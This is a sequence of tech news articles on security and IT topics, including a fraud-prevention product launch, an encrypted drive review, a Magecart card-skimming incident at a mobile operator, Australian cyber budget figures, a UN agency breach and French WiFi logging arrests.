Information Technology

F5 Networks on Tuesday introduced Shape AI Fraud Engine (SAFE), a new SaaS offering that promises to eliminate fraudulent online transactions that can sometimes bypass other security and fraud detection controls.

Leveraging technology from its $1 billion acquisition of Shape Security earlier this year, F5’s SAFE service evaluates online transactions via AI in order to understand user intent and block potential fraud before it occurs. The product marks F5’s first real push into the fraud market since acquiring Shape Security, the company said.
Following its acquisition of Shape Security, F5 has integrated Shape’s capabilities into its portfolio of application security services, with F5 serving as a traffic flow insertion point for Shape’s online fraud and abuse prevention solutions. F5’s app security services specialize in protecting applications across multi-cloud environments.
“The need for innovation in fraud prevention becomes more urgent when you factor in the accelerated shift to online channels driven by the current global health situation,” said Sumit Agarwal, VP of analytic products at F5, and co-founder of Shape. “We’re seeingfraudsters launch increasingly sophisticated attacks that take advantage of COVID-driven shifts and overall economic distress.”
Earlier this year F5 announced series of new multi-cloud application security services, including a service that brought its Web Application Firewall (WAF) technology to the NGINX platform stemming from the company’s acquisition of NGINX. 
The acquisitions of Shape Security and NGINX and recent product launches have allowed F5 to reframe its approach to security with a focus on four key areas: application layer security, trusted application access, application infrastructure security and intelligent threat services. The Shape AI Fraud Engine fits into this approach and gives F5 an entry point into the fraud prevention market. The service is available now. More

External hard drives are a great backup and portable storage solution, but if they are used to store sensitive data, they can quickly become a huge security headache.
While there is no end of external storage drives that come with software encryption solutions, but there are far from ideal in situations where security is a must.
Not only do you need the encryption/decryption software installed on all the devices you want to hook up the external drive to, but you better hope that there’s a version available for the platform you’re using. You’re probably going to be in luck if you’re running the latest version of Windows or Mac, but if you happen to run an older version of an OS, or something more exotic like Linux or Android, or perhaps an embedded system, then a software-based solution is likely to steer you into the tarpits.
This is why I like hardware solutions such as the Apricorn Aegis Padlock DT drive.
Must read: iPhone battery bad after installing iOS 14? Apple offers some help

I reviewed an Aegis Padlock DT drive a couple of years ago, and I still use one for long-term storage of sensitive data. Back then, the upper storage limit on the drive was 12TB.
12TB is a lot, but Apricorn realized that some people have greater storage needs, and have expanded the line to include 18TB of storage.
Apart from featuring the largest encrypted external USB storage capacity in its class, the Aegis Padlock DT drives offer nine capacities of secure storage, ranging from 2TB to 18TB. The drive features 256-bit AES XTS hardware-based encryption and has a polymer-coated wear-resistant on-board keypad for quick PIN authentication.
The drive’s firmware is also locked to prevent tampering with it, which Apricorn claims make its products resistant to attacks such as BadUSB.
On the connectivity front, The Aegis Padlock DT uses ultra-fast USB 3.2 Gen 1 (3.0) data transfer speeds, and all data is encrypted on the fly as it’s being written to the drive, with the devices’ PINs and data remain encrypted when the drives are at rest.
The drive is also crammed with security features, from brute-force protection, unattended auto-lock, separate admin and user modes, and even a self-destruct mode (the drive doesn’t explode, it just returns to the factory mode and looks like it hasn’t been set up).
“The Padlock DT FIPS are secure, easy to use drives for organizations that want to ensure their sensitive data is secure at all times. As ransomware continues to be one of the most dominant cyber threats organizations’ face, businesses must back up their data and store it disconnected from the network to enable fast recovery in the event of a cyber-attack whilst encrypting it to comply with data protection legislation,” said Jon Fielding, Managing Director, EMEA Apricorn. “Adding the 18TB drive to our product set provides businesses increased storage capabilities and the assurance that should they be targeted, they can thwart ransomware attempts with a secure encrypted data backup,” Fielding added.
The Apricorn Aegis Padlock DT is a solid, reliable, well-constructed storage solution for those looking for robust, secure storage. More

A mobile network operator has fallen victim to a Magecart campaign designed to steal consumer financial data. 

Malwarebytes researchers said on Monday that one of the latest organizations targeted by a Magecart group is Boom! Mobile, of which the firm’s US website has been compromised and is, at the time of writing, actively being used to harvest shopper information. 
The researchers said that Boom!, a mobile operator that claims transparency and ease-of-use as their main selling points, has so far not responded to efforts to wipe out the Magecart infection. 
Magecart is an umbrella term describing credit-card skimmer attacks and numerous cyberthreat groups that now specialize in this area. Typically, attacks are performed by exploiting a vulnerability in a website domain — including back-end content management systems (CMS) — in order to load JavaScript-based scripts able to skim data.
See also: Today’s ‘mega’ data breaches now cost companies $392 million to recover from
In order to avoid detection for as long as possible, threat actors may limit the injection of skimmer code to payment portal pages. 
Once card data has been stolen and whisked away to an attacker-controlled command-and-control server (C2), this information can be sold on in bulk, used to create clone cards, or to conduct fraudulent purchases.  
Previous victims of Magecart attacks include Ticketmaster and British Airways.
Malwarebytes says that in Oklahoma-based Boom! Mobile’s case, one of the cybersecurity firm’s crawlers found a one-line code injection containing a Base64 encoded URL leading to an external JavaScript library.
Once decoded, the URL loads a script disguised as a Google Analytics element while using the link paypal-debit[.]com/cdn/ga.js.
CNET: Huawei ban timeline: UK finds flaw of ‘national significance’ in Huawei tech
“We quickly recognize this code as a credit card skimmer that checks for input fields and then exfiltrates the data to the criminals,” the researchers said. 
The skimmer itself, however, is far from quiet. Rather than silently grab a large swathe of data and send it in one go, data is exfiltrated every time changes are detected in fields on a page — such as those used to input card details. The team noted that each leak can be viewed as a separate GET request.
It is possible that the website’s compromise was due to the use of an old version of PHP that is no longer supported. 
The group believed to be responsible relates to Fullz House, who have been previously traced to Magecart attacks using the same malicious domain and code. Fullz is a slang term used to describe data dumps containing ‘full’ stolen personally identifiable information (PII) and payment card data.  
TechRepublic: Top 5 things to know about Confidential Computing
RiskIQ published a report on Fullz House, also tracked as Magecart Group 4, in 2019. The group has diversified into both phishing and card-skimming campaigns but overlaps in domain and IP infrastructure have allowed researchers to connect the dots. In September, new fraudulent domains were registered by the group.
Malwarebytes has reported the active infection to the mobile service provider via live chat and email, but as of now, the company has not responded. 
“Their website is still compromised and online shoppers are still at risk,” the team added. 
ZDNet has reached out to Boom! Mobile for comment and will update when we hear back. 

Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

(Image: APH)
If there is one word to sum up the Australian Budget of 2020-21, it is pre-announced.

As far back as June, it’s been possible to see the framework that the government has used for its cyber announcements, at the time announcing AU$1.35 billion for its Cyber Enhanced Situational Awareness and Response (CESAR) package.
By August, another AU$320 million was kicked in via the 2020 Cyber Security Strategy to take the total to the AU$1.7 billion — the figure being thrown about with maddening glee in the papers.  
One of the rare notable pieces of funding was the fulfilment of the wish from the Commonwealth Ombudsman for more funding.
“The government will provide AU$1.6 million in 2020-21 (including $0.9 million in capital funding) to the Office of the Commonwealth Ombudsman to ensure that it can effectively oversee the use of the new Telecommunications and other Legislation Amendment (Assistance and Access) Act 2018 by law enforcement agencies,” the Budget papers stated.
“This measure will be offset by redirecting funding from the Department of Home Affairs.”
The irony is Ombudsman Michael Manthorpe was looking for funding to handle the proposed Telecommunications Legislation Amendment (IPO) Bill 2020 that would allow for Australia to work towards a bilateral agreement with the United States in order to implement the US CLOUD Act.
Entering into a bilateral CLOUD Act agreement would enable Australian law enforcement to serve domestic orders for communications data needed to combat serious crime directly on US-based companies, and vice versa.  
“If passed, the IPO Bill will make it easier for law enforcement agencies to obtain certain electronic information under proposed and future bilateral or multilateral agreements, when compared to current mutual legal assistance arrangements,” Manthorpe wrote at the time.
“On this basis, I anticipate that not only will the number of inspections my office is required to perform increase, but so too will the volume of electronic information accessed by Australian law enforcement agencies which my staff will need to asses.”
Elsewhere in the Budget papers, AU$12.7 million has been set aside for an Australia-India cyber and critical technology partnership as part of a AU$62 million plan across four years to “support the Comprehensive Strategic Partnership with India”, which includes AU$19.5 million to focus on science, technology, and innovation. This announcement was made on June 4.
The government also said it would spend AU$222 million over four years with AU$22.3 million ongoing to improve and modernise the IT systems and business practices related to export regulations in the agricultural sector. The money will go towards “simplifying interactions between farmers and exporters and the Department of Agriculture, Water and the Environment”, integrating systems to lower “regulatory burden”, as well as “mitigating export system outages and improving the cybersecurity of information”.
AU$4.9 million will also be spent across two years to “build, consolidate, and strengthen cybersecurity capability in the energy sector”, which is in addition to the AU$4.7 million that will be spent in 2020-21 on the Australian Sports Foundation to help the fundraising of community sports clubs and boost the network and cyber functions of the organisation.
Across the Cyber Security Strategy, AU$21 million will be spent in 2020-21, AU$43 million will follow in 2021-22, a further AU$37.3 million will appear in 2022-23, and AU$48 million is allocated for 2023-24. This brings the noted allocations to just over AU$149 million across the forward estimates.
Of that, the Australian Signals Directorate will lose AU$10.7 million in 2020-21, followed by AU$10.8 million of funding related to the strategy in 2021-22, and AU$11 million for 2022-23. No funding is allocated for 2023-24.
Across the four years, the Australian Federal Police will get almost AU$90 million, Home Affairs will get AU$54.2 million related to the strategy, and the Department of Industry, Science, Energy, and Resources will get AU$37.7 million.
The Budget papers stated the $1.4 billion in funding for CESAR will be spent over a decade, and that it would be offset by pulling funding from elsewhere within Defence. 
The papers also stated the Office of the eSafety Commissioner would receive AU$39.4 million over three years to “continue its work keeping Australian families safe”.
“The additional funding will enable the Office of the eSafety Commissioner to respond to a sustained increase in demand for its existing programs and fulfil additional functions and responsibilities, including overseeing a new adult cyber abuse takedown scheme under the new Online Safety Act.”

Australian Budget 2020 More

Image: UN

Special feature

Cyberwar and the Future of Cybersecurity
Today’s security threats have expanded in scope and seriousness. There can now be millions — or even billions — of dollars at risk when information security isn’t handled properly.
Read More

The United Nations International Maritime Organization (UN IMO) disclosed a security breach over the weekend that the agency categorized as a “sophisticated cyber-attack” against its IT systems.
The incident was discovered on Thursday and impacted the IMO public website and other web-based services, the UN agency said in a press release.
Email systems, its virtual conferencing platform, along with other internal and external collaboration platforms, were unaffected, an IMO spokesperson said.
Affected systems were taken down and then restored by Friday, October 2.
The agency said the attack “overcame robust security measures” it had in place to protect its IT systems.
“The IMO Headquarters file servers are located in the UK, with extensive backup systems in Geneva. The backup and restore system is regularly tested,” the agency said.
“Following the attack, the Secretariat shut down key systems to prevent further damage from the attack. The Secretariat is working with international security experts to restore systems as soon as possible, to identify the source of the attack, and further enhance security systems to prevent recurrence.”
An IMO spokesperson acknowledged a request for comment from ZDNet but did not return an email seeking for more details about the nature of the cyberattack.
It is unclear if the IMO was hit by ransomware, a website defacement, or its website was used for a watering hole attack, a type of attack where hackers host malicious code on the IMO website in an attempt to trick IMO members and visitors into downloading and infecting themselves with malware.
The IMO is the UN organization that issues international guidance on shipping, passenger ships, maritime security, and maritime environmental protection. Due to its central role in international rule-making, it is a highly important organization that often sets international policies in regard to the entire maritime field. More

Banks in Singapore are teaming up to develop a digital trade finance registry that will serve as a central database from which they can access records of trade transactions. To be built on blockchain technology, the platform aims to drive greater transparency and reduce the risk of trade fraud, including duplicate financing. 
Led by DBS Bank and Standard Chartered, the initiative is supported by 12 other banks including ABN AMRO, ANZ, Deutsche Bank, ICICI, OCBC, and UOB. Singapore-based blockchain technology startup DLTLedgers has been roped in to develop the platform, said DBS in a statement Tuesday.

The Singapore bank said it, alongside Standard Chartered, have worked for three months to establish the proof-of-concept for the digital registry that they hoped would enhance lending practices and improve transparency in commodity trade. 
“[It] aims to be an industry utility by serving as a secure central database for the banking industry to access records of trade transactions financed across banks in Singapore. This mitigates against duplicate financing from different bank lenders for the same trade inventory, leading to greater trust and confidence among banks and traders alike,” DBS said.
The initiative was supported by Enterprise Singapore and endorsed by The Association Banks of Singapore (ABS).
Without a digital registry, banks currently need to conduct validations within a single customer entity or across their own banking network, with no view of what other banks have financed or undertaken payment obligations against. The digital registry would plug this gap by facilitating collaboration across market players and government agencies, DBS said. 
Enterprise Singapore’s assistant CEO Satvinder Singh noted that the development of the “neutral and secure platform” would ease the flow of information between banks and boost their risk management capabilities, driving greater confidence in the finance and trade sectors. 
After the proof-of-concept was completed, DBS said it would work with Standard Chartered and ABS to deploy the digital registry in Singapore before expanding it at a later stage to cover “major trade corridors” globally.
The ABS would also manage the digital registry, supported by a committee comprising ABS Council member banks. In addition, three working groups of banks would be set up to jointly lead the governance, technical development, and business scope of the project. All banks would be invited to join the registry as members. 
RELATED COVERAGE More

Australia’s Communications Access Coordinator (CAC) is concerned by the level of understanding within the nation’s telcos about the risk that network virtualisation can introduce.
The CAC role was created under Australia’s Telecommunications Sector Security Reforms (TSSR) and is charged with assessing whether changes made by telcos to their networks expose them to unauthorised access or interference, and if that is the case, it issues recommendations for changes.
In the Telecommunications Sector Security Reforms — Report for 2019-20 tabled in Parliament on Tuesday, a number of Australian telcos notified the CAC that they were automating their network configurations.
“These changes featured high levels of technical complexity and equally complex supply chains. In several instances the CAC had concerns about the notifying carrier’s understanding and appreciation of the risks presented by the proposed change, particularly the risks associated with complex multi-vendor/subcontractor, multi-jurisdiction supply chains,” the report said.
“The CAC also had concerns in several instances with carriers misunderstanding the level of exposure they had in proposing to outsource or ‘hybridise’ their infrastructure environment.
“In each of these instances during the reporting period the CAC informed the relevant carriers of the concerns and suggested measures that they could implement to ensure they could continue to comply with their security obligation while proceeding with the change.”
The report also said the CAC received multiple notices of a carrier proposing to use a managed service provider, where the CAC thought the carrier would lose its ability to “maintain competent supervision of, and effective control over, telecommunications networks and facilities owned or operated by the carrier”.
The CAC was concerned by the lack of supervision over the provider’s activities, the lack of consideration over the location from where the provider would be serving the telco out of, and “limited assurance” the carrier had “effective control” over the network or facilities being provided. In these instances, the CAC recommended changes.
Over the course of the year to June 30, the CAC responded with 24 “some risk” notices to telcos, 6 “no risk” notices, and had two notices outstanding. The Minister for Home Affairs did not issue any directions over the year.
The TSSR laws were used in 2018 to ban Huawei and ZTE from Australia’s 5G networks.
“The Department [of Home Affairs] has continued to work closely with telecommunications operators to ensure they understand their TSSR obligations with respect to deploying and operating 5G networks and services,” the report said.
“The department has also worked with non-5G mobile network operators to understand and manage the potential sustainment risks associated with the United States’ export restrictions affecting certain telecommunications infrastructure vendors.”
The report said CAC would be able to respond quicker if telcos provided sufficient information.
The TSSR was passed by Parliament in September 2017, after the Parliamentary Joint Committee on Intelligence and Security recommended a number of changes, including an annual reporting mechanism to Parliament.
Also tabled on Tuesday was a report on the operation of the Critical Infrastructure Act for the year to June 30.
Passed in March 2018, the Act created a register of critical infrastructure assets which included asset ownership, access, and control.
Over the year, the nation’s electricity, water, gas, and port sectors reported 118 notifications to Home Affairs, which consisted of 109 changes, and nine new additions to the register.
None of the ministerial directions, information gathering powers, enforcement powers, nor any private declarations were issued.
The recent 2020 Cyber Security Strategy said the federal government was looking to impose an enforceable “positive security obligation” on designated critical infrastructure operators through amendments to the Act.
Related Coverage More

Image: Tony Lee

In one of the weirdest arrests of the year, at least five bar and cafe managers from the French city of Grenoble were taken into custody last week for running open WiFi networks at their establishments and not keeping logs of past connected users.
The bar and cafe owners were arrested for allegedly breaking a 14-year-old French law that dictates that all internet service providers must keep logs on all their users for at least one year.
According to local media reports [1, 2, 3], the bar and cafe owners claimed they were not aware that such a law even existed, let alone that it applied to them as they had not received notifications from their union, which usually sends alerts of industry-wide legal requirements.
Nonetheless, French media pointed out that the law’s text didn’t only apply to internet service providers (ISPs) in the broad meaning of the word — as in telecommunications providers — but also to any “persons” who provide internet access, may it be free of charge or via password-protected networks.
The bar and cafe owners were eventually released after questioning.
According to French law number 2006-64, they now risk up to one year in prison, a personal fine of up to €75,000, and a business fine of up to €375,000.
Connection logging is a feature supported on most commercial routers and has been added for this specific reason, as countries around the world began introducing data logging laws for their local ISPs.
Law enforcement agencies often rely on these logs to track down malicious behavior or details about suspects using public WiFi networks to commit crimes. More